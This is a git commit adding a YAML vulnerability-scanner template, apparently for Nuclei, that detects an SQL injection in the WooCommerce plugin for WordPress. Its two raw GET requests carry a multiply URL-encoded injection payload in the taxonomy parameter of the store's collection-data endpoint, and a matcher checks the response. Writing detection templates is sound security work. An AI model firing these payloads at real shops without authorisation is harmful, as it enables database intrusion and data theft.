Add WooCommerce SQLi Template

2021-07-15 17:02:19 +00:00 · 2021-07-15 17:02:19 +00:00 · ede6df8fa4
parent dfe4814eb4
commit ede6df8fa4
1 changed files with 23 additions and 0 deletions
--- a/vulnerabilities/wordpress/wordpress-woocommerce-sqli.yaml
+++ b/vulnerabilities/wordpress/wordpress-woocommerce-sqli.yaml
@ -0,0 +1,23 @@
+id: wordpress-woocommerce-sqli
+
+info:
+  name: WordPress Woocommerce Plugin
+  author: @rootxharsh @iamnoooob @S1r1u5_
+  severity: critical
+  tags: wordpress,woocomernce
+
+
+requests:
+  - raw:
+      - |
+        GET /wp-json/wc/store/products/collection-data?calculate_attribute_counts[0][query_type]=or&calculate_attribute_counts[0][taxonomy]=aa%252522%252529or%2525201%25253D1%252523&attributes[0][taxonomy]=11 HTTP/1.1
+        User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0
+      - |
+        GET /?rest_route=/wc/store/products/collection-data&calculate_attribute_counts[0][query_type]=or&calculate_attribute_counts[0][taxonomy]=aa%252522%252529or%2525201%25253D1%252523&attributes[0][taxonomy]=11 HTTP/1.1
+        User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0
+
+    req-condition: true
+    matchers:
+      - type: dsl
+        dsl:
+          - 'contains(tolower(all_headers), "application/json") && contains(body_1, "{\"term\":") || contains(body_2, "{\"term\":")'